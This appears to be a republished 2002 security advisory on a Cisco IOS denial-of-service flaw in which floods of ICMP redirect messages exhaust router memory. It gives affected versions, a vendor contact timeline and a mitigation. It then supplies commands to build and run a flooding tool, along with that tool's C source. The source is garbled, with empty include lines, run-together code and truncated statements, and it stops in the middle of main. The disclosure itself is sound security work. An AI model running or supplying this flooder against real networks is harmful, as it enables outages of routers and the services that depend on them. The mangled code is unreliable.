CiscoIOSICMPRedirectDoS - 王朝网络宽屏版

Cisco Systems IOS is vulnerable to a denial-of-service attack using ICMP

Redirect messages.

When flooded with ICMP redirect messages, the IOS uses up all its memory

to store the new host routes. The device is then unable to perform

operations that need additional memory such as receiving routing updates

and accepting inbound telnet(1) connections.

DETAILS

Known vulnerable combinations:

* Cisco 1005 with IOS 11.0(18)

* Cisco 1603 with IOS 11.3(11b)

* Cisco 1603 with IOS 12.0(3)

* Cisco 2503 with IOS 11.0(22a)

* Cisco 2503 with IOS 11.1(24a)

Known to be not vulnerable:

* Cisco 1603 with IOS 12.1(11)

* Cisco 1603 with IOS 12.2(5)

* Cisco 2503 with IOS 11.2(26a)

* Cisco 2503 with IOS 11.3(11b)

* Cisco 2503 with IOS 12.0(19)

Description:

ICMP redirect messages are used in IP networks to inform a sending device

about inefficient routing. Cisco IOS software stores redirect messages it

receives in memory for further consultation. They do not become part of

the normal routing table.

When generating ICMP redirect messages with random IP addresses in the

"offending packet" section of the ICMP frame, IOS will include this IP

address in its ICMP redirection table. In the vulnerable versions of IOS,

this table has no size limit. Later versions of IOS enforce a limit of

16000 redirects and therefore limit the amount of used memory to

approximately 1.16MB.

Some device/IOS combinations tested were unable to perform normal IP

routing for a limited time, but most combinations continued to function as

a router. In some cases, even access to the console was denied because of

low memory.

According to Gaus, affected devices should

recover after 4 hours since the redirect table entries time out. However,

vulnerable versions tested did not recover.

Vendor status:

11/16/2001 to 05/05/2002 Contacted Cisco 8 times over past 6 months

concerning status.

05/07/2002 Gaus says Cisco developers assigned a low priority to the bug.

05/11/2002 Provide a copy of this file to Cisco prior to publication.

05/20/2002 Final corrections by Cisco included.

05/21/2002 Info from Cisco: Fix available shortly.

Example:

To generate random ICMP redirect messages, a sender tool is available at

http://www.phenoelit.de/irpas/icmp_redflod.c, which has to be linked with

the IRPAS packet library.

linuxbox# cd /where/irpas/is

linuxbox# make libpackets.a

linuxbox# gcc -o icmp_redflod -I. -L. icmp_redflod.c -lpackets

linuxbox# ./icmp_redflod -i eth0 -D -G

On high bandwidth networks, the command line switch -w0 can be used to

increase the sending rate.

Solution:

Filter inbound ICMP redirect messages or update your IOS to either a not

vulnerable release or a fixed version when these become available.

Exploit code:

/* ICMP redirect flooder

* FX

* Phenoelit (http://www.phenoelit.de)

* (c) 2k++

* $Id: icmp_redflod.c,v 1.3 2002/05/11 14:59:06 fx Exp fx $

#include

#include #include#include#include#include "protocols.h"#include "packets.h"#include "build.h"#include#include/* definitions */#define IPTTL 0x80#define DEFAULT_DELAY 100000#define BANNER "ICMP Redir Flooder $Revision: 1.3 $\n" "\t(c) 2k++ FX\n" "\tPhenoelit (http://www.phenoelit.de)\n"/* config */struct {int verbose;char *device;int flood;int spoof_src;int code;struct in_addr dest;struct in_addr src;struct in_addr gw;unsigned int delay;} cfg;/** globals*/u_char *rawpacket;int icmpsfd;sig_atomic_t stop_flag=0;unsigned long iii=0;/************************************* prototypes */void usage(char *n);u_char *construct_icmp_redirect(struct in_addr *dest,struct in_addr *newgw, int *psize);/* PCAP */void signaler(int sig);/* the main function */int main(int argc, char **argv) {char option;extern char *optarg;u_char *icp;int icl;memset(&cfg,0,sizeof(cfg));cfg.delay=DEFAULT_DELAY; cfg.flood=1; cfg.code=0xFF;while ((option=getopt(argc,argv,"vfc:i:S:G:D:w:"))!=EOF) {switch (option) {case 'v': /* verbose */cfg.verbose++;break;case 'f': cfg.flood=0;break;case 'i': /* local network device */cfg.device=smalloc(strlen(optarg)+1);strcpy(cfg.device,optarg);break;break;case 'S': /* spoof source */if (inet_aton(optarg,&(cfg.src))==0) {fprintf(stderr,"source IP address seems to be wrong\n");return (1);}cfg.spoof_src++;break;case 'G': /* set gw */if (inet_aton(optarg,&(cfg.gw))==0) {fprintf(stderr,"Gateway IP address seems to be wrong\n");return (1);}break;case 'D': /* dest address */if (inet_aton(optarg,&(cfg.dest))==0) {fprintf(stderr,"dest IP address seems to be wrong\n");return (1);}break;case 'w': cfg.delay=atoi(optarg);break;case 'c': cfg.code=atoi(optarg);break;default: usage(argv[0]);}}if (!cfg.device) usage(argv[0]);/** TODO: add output on what we are about to do*/srand((unsigned int)time(NULL));/* set up ICMP sender socket (IP) */if ((icmpsfd=init_socket_IP4(cfg.device,0))/* if spoofing is enabled, copy it */if (!cfg.spoof_src) {memcpy(&(cfg.src.s_addr), &(packet_ifconfig.ip.s_addr), IP_ADDR_LEN);}/* signal handling */signal(SIGTERM,&signaler);signal(SIGABRT,&signaler);signal(SIGINT,&signaler);/* my shit */printf(BANNER); printf("\tIRPAS build %s\n",BUILD);printf("Performing flood ...\n");if (cfg.flood) {while (!stop_flag) {icp=construct_icmp_redirect(&(cfg.dest),&(cfg.gw),&icl);sendpack_IP4(icmpsfd,icp,icl);free(icp);if (cfg.delay0) usleep(cfg.delay);}} else {icp=construct_icmp_redirect(&(cfg.dest),&(cfg.gw),&icl);sendpack_IP4(icmpsfd,icp,icl);free(icp);